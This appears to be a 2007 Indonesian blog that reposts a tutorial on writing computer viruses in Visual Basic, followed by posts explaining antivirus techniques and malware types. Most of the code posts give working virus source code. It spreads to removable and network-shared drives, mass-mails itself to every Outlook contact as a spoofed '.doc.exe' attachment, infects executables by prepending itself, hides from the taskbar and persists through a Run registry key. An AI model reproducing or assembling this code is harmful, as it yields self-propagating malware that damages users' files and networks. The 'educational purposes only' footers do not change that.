Thursday, August 9, 2007

Mempercepat penyebarannya dengan memanfaatkan kelemahan dari suatu system

Penulis tidak akan membahas tentang teknik yang satu ini.
Pada dasarnya cara kerjanya
adalah seperti ini, misalnya pada Windows yang otomatis
menjalankan file dengan script
extension tertentu (Contoh teknik virus Redlof), sehingga
program virus dapat membuat
script tersebut untuk mentrigger program virus.
Ada juga worms yang memanfaatkan kelemahan Outlook
Express, dimana secara
otomatis menjalankan Attachment tanpa klik dari pemakai.
Ada juga worms yang menyebarkan diri melalui website,
dimana jika anda mengunjungi
suatu website dengan software browser yang memiliki
kelemahan, maka secara otomatis
browser mendownload kode yang tidak diinginkan dan
menjalankannya.
Ada juga worms yang menyebar melalui media Bluetooth yang
dalam keadaan terbuka.
Menyebarkan dirinya dengan filename spoofing.
Teknik filename spoofing banyak digunakan oleh worms
dewasa ini dengan
menggunakan double extension :
Misalnya :
SuratCinta.doc.pif
Pada system yang settingnya tidak menampilkan extension
file maka file tersebut diatas
ditampilkan pada system sebagai :
SuratCinta.doc


---------------------------------------------------------------------------
Pengen Coba Music Mail GRATIS? Aktifkan Music Mail anda di mail Telkom.net dan Plasa.com
dan kirim email dengan Music Mail ke seluruh rekan anda. Berlaku hingga 31 Agustus 2007.
---------------------------------------------------------------------------

Mempercepat proses penyebarannya melalui media pertukaran data dan informasi

Menyebarkan dirinya ke Floppy Disk, diaktifkan dengan
suatu timer. Program ini bekerja
dengan senantiasa memantau terhadap keaktifkan jendela 3½
Floppy (A:) oleh pemakai.
Public Sub InfeksiFloppy()
On Error GoTo BatalInfeksi
Dim floppy_hwnd As Long
Dim fname As String
'Jika Jendela Floppy terbuka
floppy_hwnd = FindWindow(vbNullString, "3½ Floppy (A:)")
If Not floppy_hwnd = 0 Then
Call InfeksiResource("A:", "DOCXLS") 'Hanya infeksi Doc,
Exe jangan
End If
BatalInfeksi:
End Sub
Menyebarkan dirinya ke Flash Disk, diaktifkan dengan suatu
timer. Program ini bekerja
dengan senantiasa memantau removable drive diatas drive C.
Public Sub InfeksiFlashDisk()
On Error GoTo BatalInfeksi
Dim ObjFSO As Object
Dim ObjDrive As Object
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
For Each ObjDrive In ObjFSO.Drives
'Asumsi semua removable drive diatas huruf C adalah flash
disk
'1 - Removable drive
'2 - Fixed drive (hard disk)
'3 - Mapped network drive
'4 - CD-ROM drive
'5 - RAM disk
If ObjDrive.DriveType = 1 And ObjDrive.DriveLetter > "C"
Then
Call InfeksiResource(ObjDrive.DriveLetter + ":", "XLSDOC")
End If
Next
BatalInfeksi:
End Sub
Menyebarkan dirinya ke semua resource yang di Share pada
computer yang terinfeksi :
Public Sub InfeksiMySharing()
Dim shares() As String, share As Variant, target As String
If GetShares("\\127.0.0.1", "Microsoft Windows Network",
shares) = True Then
For Each share In sharesPage 6

Hanya untuk tujuan pendidikan saja
6
target = share
Call InfeksiResource(target, "XLSDOCEXE")
Next share
End If
End Sub
Menyebarkan dirinya ke semua resource share yang terbuka
di LAN, dengan mengambil
semua Domain maupun Workgroup dan menyimpannya dalam suatu
stack.
Public Sub AmbilDomain()
Dim Domains() As String, Domain As Variant
If GetShares("", "Microsoft Windows Network", Domains) =
True Then
For Each Domain In Domains
If Not stackDomain.isFull Then
stackDomain.Push (Domain)
End If
Next Domain
End If
End Sub
Kemudian mengambil computer yang berada pada masing-masing
Domain maupun
Workgroup dalam suatu stack.
Public Sub AmbilComputer()
Dim Computers() As String, Domain As String, Computer As
Variant
If Not stackDomain.isEmpty() Then
Domain = stackDomain.Pop()
If GetShares(Domain, "Microsoft Windows Network",
Computers) = True Then
For Each Computer In Computers
If Not stackComputer.isFull Then
stackComputer.Push (Computer)
End If
Next Computer
End If
End If
End Sub
Dan Akhirnya mengambil semua resource yang dishare dari
masing-masing Computer :
Public Sub AmbilDrive()
Dim Drives() As String, Computer As String, Drive As
Variant
If Not stackComputer.isEmpty() Then
Computer = stackComputer.Pop()
If GetShares(Computer, "Microsoft Windows Network",
Drives) = True Then
For Each Drive In Drives
If Not stackDrive.isFull ThenPage 7

Hanya untuk tujuan pendidikan saja
7
stackDrive.Push (Drive)
End If
Next Drive
End If
End If
End Sub
Public Sub InfeksiNetworkDrive()
Dim target As String
If Not stackDrive.isEmpty() Then
target = stackDrive.Pop()
Call InfeksiResource(target, "XLSDOCEXE")
End If
End Sub
Melakukan penyebaran melalui fasilitas email :
Public Sub SpreadEmailOutlook()
Dim Outlook As Object
Dim Mapi As Object
Dim Mail As Object
Dim AddressBook As Variant
Dim MailAddress As Variant
Dim i As Integer, j As Integer
On Error GoTo finally
Set Outlook = CreateObject("Outlook.Application")
Set Mapi = Outlook.GetNamespace("MAPI")
For i = 1 To Mapi.AddressLists.Count
Set AddressBook = Mapi.AddressLists(i)
For j = 1 To AddressBook.AddressEntries.Count
MailAddress = AddressBook.AddressEntries(j)
Set Mail = Outlook.CreateItem(0)
Mail.Recipients.Add (MailAddress)
Mail.Subject = "Subject Virus Anda"
Mail.Body = vbCrLf & "Pesan anda agar pemakai tertarik
membuka attachment."
Mail.Attachments.Add Environ$("windir") & "\" & attachment
& ".doc.exe"
Mail.Send
Next
Next
finally:
Set Outlook = Nothing
Set Mapi = NothingPage 8

Hanya untuk tujuan pendidikan saja
8
End Sub


---------------------------------------------------------------------------
Pengen Coba Music Mail GRATIS? Aktifkan Music Mail anda di mail Telkom.net dan Plasa.com
dan kirim email dengan Music Mail ke seluruh rekan anda. Berlaku hingga 31 Agustus 2007.
---------------------------------------------------------------------------

Menyebarkan dirinya melalui media file executable

Program virus harus dapat menginfeksi program-program
executable dengan proses
sebagai berikut :
Program Executable
Setelah terinfeksi oleh program virus menjadi :
Program Virus + Program Executable + Ukuran Virus +
Signature Virus
Sehingga setiap kali program yang telah terinfeksi
dijalankan, maka Program Virus akan
menginstalasi dirinya ke computer korban dan mengembalikan
proses ke Program
Executable.
Jadi pada saat program terinfeksi dijalankan, maka Program
Executable harus di pulihkan
kembali dengan melakukan perhitungan :
Posisi Program Executable = Ukuran File – Ukuran
Virus – Ukuran Signature Virus
Sesuatu hal yang harus diperhatikan adalah infeksi
terhadap Program Executable tidak
boleh dilakukan berulang-ulang dan tidak boleh menginfeksi
diri Program Virus sendiri,
sehingga harus ditambahkan suatu Signature Virus
Private Sub PeriksadanInfeksiExe(fname As String)
Dim tSignature As String * 5
Dim OriginalCode As String
Dim fNum As Integer
'Jangan menginfeksi diri sendiri
'Hanya menginfeksi file berukuran lebih dibawah 1 Mega
If Dir(fname) <> "" Then
If FileLen&(fname) > virSize And FileLen&(fname) < 1048576
Then
'Ambil nomor file
fNum = FreeFile
Open fname For Binary Access Read As fNum 'Buka file
target
Seek fNum, LOF(fNum) - 5 + 1
'pindah file pointer ke posisi Signature Virus
tSignature = Space$(5)
Get fNum, , tSignature
'baca tSignature
Close fNum
If tSignature <> virSignature Then
'jika file virus (tidak ada virSignature)
On Error GoTo finally
Open fname For Binary Access Read Write As fNum 'Buka file
target
OriginalCode = Space$(LOF(fNum))
Get fNum, , OriginalCode
'baca Program Executable
Put fNum, 1, virCode
'tulis Program Virus diawal
Put fNum, , OriginalCode
'tulis Program Executable
Put fNum, , virSize
'tulis Ukuran Virus
Put fNum, , virSignature
'tulis Signature VirusPage 3

Hanya untuk tujuan pendidikan saja
3
Close fNum
finally:
End If
End If
End If
End Sub
Ketika program Executable dijalankan maka :
Private Sub VirusInitial()
Dim OriginalCode As String
Dim tSignature As String * 5
Dim fNum As Integer
Dim fname As String
virSignature = Chr$(3) + Chr$(53) + Chr$(103) + Chr$(153)
+ Chr$(203)
Open exePath + App.EXEName + ".exe" For Binary Access Read
As #1
Seek #1, LOF(1) - 5 + 1
'pindah file pointer ke posisi virSize
tSignature = Space$(5)
Get #1, , tSignature
'baca virSignature
If tSignature <> virSignature Then 'Jika file virus
sendiri
virSize = LOF(1)
'ukuran virSize sama dengan ukuran file
virCode = Space$(virSize)
'siapkan buffer virCode
Seek #1, 1
'ke posisi bof
Get #1, , virCode
'baca virCode sebesar ukuran virSize
Close #1
Call VirInstall
'instalasi virus
If Not SudahLoad Then
Load ff
'aktifkan timer virus
End If
'Jika file yang terinfeksi
Else
Seek #1, LOF(1) - 9 + 1
'pindah file pointer ke posisi virSize
Get #1, , virSize
'baca virSize (long = 4 byte)
'Baca vircode
virCode = Space$(virSize)
Seek #1, 1
'ke posisi BOF (Awal file)
Get #1, , virCode
'baca virCode sebesar ukuran virSize
OriginalCode = Space$(LOF(1) - virSize)
'siapkan buffer
Get #1, , OriginalCode
'baca originalCodePage 4

Hanya untuk tujuan pendidikan saja
4
fNum = 0
Do While Dir(exePath & App.EXEName & fNum & ".exe") <> ""
fNum = fNum + 1
Loop
fname = exePath & App.EXEName & fNum & ".exe"
On Error GoTo finally
Open fname For Binary Access Write As #2
Put #2, , OriginalCode
'tulis ke file sementara
Close #2
'tutup file sementara
finally:
Close #1
Call VirInstall
If Not SudahLoad Then
Load ff
'aktifkan timer virus
End If
Call ExecuteOriginal(fname)
Kill fname
'hapus file sementara
End If
End Sub
Private Sub ExecuteOriginal(fname)
Dim Host As Long, HProc As Long, HExit As Long
Host = Shell(fname, vbNormalFocus)
'jalankan fname
HProc = OpenProcess(PROCESS_ALL_ACCESS, False, Host)
GetExitCodeProcess HProc, HExit
'ambil status aktif
Do While HExit = STILL_ACTIVE
'proses ditahan selama proses masih aktif
DoEvents
'lakukan event yang lain
GetExitCodeProcess HProc, HExit
Loop
End Sub
Private Function SudahLoad() As Boolean
Dim vir_hwnd As Long
'Jika Jendela virus aktif
vir_hwnd = FindWindow(vbNullString, titleSudahLoad)
SudahLoad = Not (vir_hwnd = 0)
End Function


---------------------------------------------------------------------------
Pengen Coba Music Mail GRATIS? Aktifkan Music Mail anda di mail Telkom.net dan Plasa.com
dan kirim email dengan Music Mail ke seluruh rekan anda. Berlaku hingga 31 Agustus 2007.
---------------------------------------------------------------------------

Menyembunyikan prosesnya dari pemakai

Agar program tidak menampilkan dirinya pada Task Bar,
dapat digunakan perintah :
App.TaskVisible = False
Kemudian untuk menyembunyikan form dapat menggunakan :
Me.Visible = False


<<<<<< Mengaktifkan dirinya setiap startup sistem>>>>>>>


Agar program exe dapat diaktifkan setiap kali startup
system, kita dapat menduplikasi
program ke suatu folder dengan perintah :
FileCopy app.Path & "\" & app.EXEName , environ$("windir")
& "\" & app.EXEName
dan menambah ke registry :
Dim WShell as Object
Set WShell = CreateObject("WScript.Shell")
WShell.regwrite
&#8220;HKLM\Software\Microsoft\Windows\CurrentVersion\Run\virusku",
environ$("windir") & "\" & app.EXEName
Set WShell = Nothing


---------------------------------------------------------------------------
Pengen Coba Music Mail GRATIS? Aktifkan Music Mail anda di mail Telkom.net dan Plasa.com
dan kirim email dengan Music Mail ke seluruh rekan anda. Berlaku hingga 31 Agustus 2007.
---------------------------------------------------------------------------

Teknik Pembuatan Virus Komputer

Syarat sebuah virus computer :
1. Menyembunyikan prosesnya dari pemakai
2. Mengaktifkan dirinya setiap startup sistem
3. Menyebarkan dirinya melalui media file executable
4. Mempercepat proses penyebarannya melalui media
pertukaran data dan informasi
5. Mempercepat penyebarannya dengan memanfaatkan kelemahan
dari suatu system
6. Menyebarkan dirinya dengan filename spoofing.
7. Mempercepat proses penyebarannya dengan pendekatan
social engineering
8. Berusaha mempertahankan existensi dirinya
Tanpa menggunakan teori yang panjang dan lebar, kita akan
membahas bagaimana hal
tersebut diatas dapat dilakukan dengan menggunakan bahasa
pemrograman Visual Basic.


---------------------------------------------------------------------------
Pengen Coba Music Mail GRATIS? Aktifkan Music Mail anda di mail Telkom.net dan Plasa.com
dan kirim email dengan Music Mail ke seluruh rekan anda. Berlaku hingga 31 Agustus 2007.
---------------------------------------------------------------------------

Anti Virus Software

Anti-virus software adalah sebuah program komputer yang
digunakan untuk
memeriksa file-file dengan tujuan mengidentifikasi dan
menghapus virus komputer dan
malware lainnya.
Pada saat ini ada tiga jenis teknologi anti virus yang
lazimnya digunakan, yaitu:
scanners, monitors, dan integrity checkers.
1.4.1 Scanners
Scanners adalah program yang memeriksa file&#8211;file
executable untuk menemukan
rangkaian kode yang merupakan bagian dari komputer virus
yang telah diketahui
sebelumnya. Pada saat ini scanners adalah jenis program
anti virus yang paling banyak
digunakan dengan alasan kemudahan dalam proses maintenance
(pemeliharaan).
Pada dasarnya scanners terdiri atas:
Search Engine
Database yang berisi rangkaian kode sekuensial dari virus
yang telah diketahui
sebelumnya (sering kali disebut juga virus signatures atau
scan strings).
Jika sebuah virus baru ditemukan, maka database akan
di-update dengan signature
yang dimiliki hanya oleh virus tersebut dan tidak terdapat
di dalam program lainnya. Hal ini
dapat dilakukan tanpa memerlukan pemahaman yang lebih jauh
mengenai virus tersebut.
Beberapa kelemahan yang dimiliki scannners adalah:
Scanners harus tetap dijaga agar up-to-date secara terus
menerus karena scanners
hanya dapat mendeteksi virus yang telah diketahui
sebelumnya.Page 9

Virus Komputer: Sejarah dan Perkembangannnya
6
Scanners cenderung rentan terhadap virus polymorphic yang
memiliki kemampuan
untuk mengubah/mengkodekan dirinya sendiri sehingga
terlihat berbeda pada setiap
file yang terinfeksi. Hal ini dapat diatasi dengan
memahami mutation engine yang
terdapat di dalam virus tersebut secara mendetail.
Proses scanning yang dilakukan dalam mendeteksi keberadaan
virus-virus cenderung
bersifat time-consuming, mengingat keberadaan virus-virus,
worms, dan trojan
horses dengan jumlah yang luar biasa banyaknya.
1.4.2 Monitors
Monitors adalah program yang &#8216;tinggal&#8217;
(besifat residensial) di dalam memory
komputer untuk secara terus menerus memonitor fungsi dari
sistem operasi yang bekerja.
Pendeteksian sebuah virus dilakukan dengan memonitor
fungsi-fungsi yang diindikasikan
berbahaya dan memiliki sifat seperti sebuah virus, seperti
merubah isi dari sebuah file yang
executable dan tindakan-tindakan yang mem-bypass sistem
operas. Ketika sebuah program
mencoba melakukan hal-hal di atas, maka monitors akan
memblok eksekusi dari program
tersebut.
Tidak seperti halnya scanners, monitors tidak memerlukan
update secara terus
menerus. Namun kelemahan utama dari monitors adalah
kerentanan terhadap virus tuneling
yang memiliki kemampuan untuk mem-bypass program monitors.
Hal ini dikarenakan pada
sistem operasi PC pada umumnya, sebuah program yang sedang
dieksekusi (termasuk
sebuah virus) memiliki akses penuh untuk membaca dan
mengubah daerah manapun di
dalam memori komputer bahkan yang merupakan bagian dari
sistem operasi tersebut
sehingga monitors yang juga merupakan bagian dari memori
komputer dapat dilumpuhkan.
Kelemahan porgram monitors lainnya adalah kesalahan yang
kerap kali dilakukannya
mengingat pendeteksian virus didasarkan pada
kelakuan-kelakuan seperti yang disebutkan di
atas, sehingga kerap kali fungsi dari sebuah program lain
(yang bukan merupakan virus
komputer) dianggap sebagai sebuah virus.
1.4.3 Integrity Checkers
Integrity checkers adalah program yang mampu mendeteksi
objek executable lain
yang telah dimodifikasi dan mendeteksi infeksi dari sebuah
virus. Integrity checkers bekerja
dengan cara menghitung checksum (menghitung integritas)
dari kode-kode program yang
executable dan menyimpannya di dalam sebuah database.
Kemudian secara periodik
checksum dari program-program tersebut akan dihitung ulang
dan dibandingkan dengan
database checksum tersebut. Beberapa pakar menilai bahwa
database checksum ini harus Page 10

Virus Komputer: Sejarah dan Perkembangannnya
7
dilalui proses kriptografi setelah proses perhitungan
checksum selesai, untuk menghindari
usaha modifikasi yang dapat dilakukan oleh virus komputer.
Pada saat ini terdapat beberapa jenis integrity checkers:
Off-line integerity checkers: perlu di-run terlebih dahulu
untuk memeriksa checksum
dari seluruh kode executable yang terdapat di dalam sistem
komputer ybs.
Integrity checkers yang bekerja dengan cara membuat
modul-modul yang akan di-
attach pada file executable dengan bantuan program khusus
tertentu. Sehingga bila
file executable tersebut dijalankan, ia akan melakukan
proses perhitungan checksum-
nya sendiri. Namun hal ini memiliki kekurangan karena
tidak seluruh file executable
dapat diperlakukan seperti ini, dan integrity checkers
jenis ini dapat dengan mudah
di-bypass oleh virus steath.
Jenis terakhir dari integrity checkers yang bersifat
residensial (mendiami) memori dan
akan melakukan perhitungan ketika objek executable
dieksekusi.
Integrity checkers tidak bersifat virus-specific sehingga
tidak memerlukan update
secara terus menerus seperti scanners. Selain itu karena
integrity checkers tidak berusaha
memblok kerja dari virus komputer seperti halnya monitors,
maka integrity checkers tidak
dapat di-bypass oleh virus tunneling.
Beberapa kekurangan yang dimiliki integrity checkers:
Integrity checkers tidak memiliki kemampuan untuk mencegah
proses penginfeksian
oleh sebuah virus. Ia hanya dapat mendeteksi dan
melaporkan hasil pendeteksian
yang dilakukannya tersebut.
Integrity checkers pertama kali harus di sistem yang bebas
virus, jika tidak maka
hasil perhitungan pertama yang dilakukannya merupakan
hasil perhitungan yang
telah terinfeksi. Sehingga pada umumnya, pada saat proses
peng-install-an program
integrity checkers dilengkapi dengan scanners untuk
memastikan sistem bebas virus.
Integrity checkers rentan terhadap false positive (kesalah
indikasi keberadaan virus
pada program yang sebenarnya bebas virus) , karena
integrity checkers mendeteksi
perubahan bukan virus.
Integrity checkers tidak dapat mendeteksi sumber dari
infeksi virus, walaupun dapat
mendeteksi proses penyebaran virus dan mengidentifikasi
objek yang baru terinfeksi.
Integrity checkers rentan terhadap slow viruses, karena
slow virus menginfeksi file
target ketika file tersebut ditulis ke dalam disk. Page 11

Virus Komputer: Sejarah dan Perkembangannnya
8
Meskipun adanya kekurangan-kekurangan di atas, banyak
pakar menganggap
integrity checkers sebagai pertahanan yang paling baik
terhadap ancaman virus komputer
dan malware lainnya.


---------------------------------------------------------------------------
Pengen Coba Music Mail GRATIS? Aktifkan Music Mail anda di mail Telkom.net dan Plasa.com
dan kirim email dengan Music Mail ke seluruh rekan anda. Berlaku hingga 31 Agustus 2007.
---------------------------------------------------------------------------

Klasifikasi Virus Komputer

Virus komputer dan program lain yang membahayakan sistem
komputer dapat
diklsifikasikan ke dalam beberapa kelompok menurut
bagaimana cara mereka untuk
menjangkiti (infect) sebuah sistem komputer, bagian dari
sistem komputer yang mereka
jangkiti, atau kelakuan (behaviour) yang dimiliki oleh
mereka. Namun pada dasarnya definisi
dan klasifikasi mengenai kode-kode program berbahaya ini
masih rancu dan menjadi
kontroversi bagi banyak orang bahkan bagi orang yang
memang mendalami bidang
komputer.
Berikut adalah contoh klasifikasi dari berbagai jenis
harmful program [3]:
Malware: merupakan singkatan dari malicious software,
merujuk pada program yang
dibuat dengan tujuan membahayakan atau menyerang sebuah
sistem komputer.
Terdiri atas virus komputer (computer viruses), computer
worms, trojan horses, joke
programs dan malicious toolkits.
Computer virus: merujuk pada program yang memiliki
kemampuan untuk bereplikasi
dengan sendirinya.
Computer worm: merujuk pada program independen yang
memiliki kemampuan
untuk bereplikasi dengan sendirinya. Indepen di sini
memiliki makna bahwa worm
tidak memiliki host program sebagaimana virus, untuk
ditumpangi. Sering kali worm
dikelompokan sebagai sub-kelas dari virus komputer.
Trojan horse: merujuk pada program independen yang dapat
mempunyai fungsi yang
tampaknya berguna, dan ketika dieksekusi, tanpa
sepengetahuan pengguna, juga
melaksanakan fungsi-fungsi yang bersifat destruktif.
Malicious toolkits: merujuk pada program yang didesain
untuk membantu
menciptakan program-program yang dapat membahyakan sebuah
sistem komputer.
Contoh dari program jenis ini adalah tool pembuat virus
dan program yang dibuat
untuk membantu proses hacking.
Joke program: merujuk pada program yang meniru
operasi-operasi yang dapat
membahayakan sistem komputer, namun sebenarnya dibuat
untuk tujuan lelucon
dan tidak mengandung operasi berbahaya apapun.


---------------------------------------------------------------------------
Pengen Coba Music Mail GRATIS? Aktifkan Music Mail anda di mail Telkom.net dan Plasa.com
dan kirim email dengan Music Mail ke seluruh rekan anda. Berlaku hingga 31 Agustus 2007.
---------------------------------------------------------------------------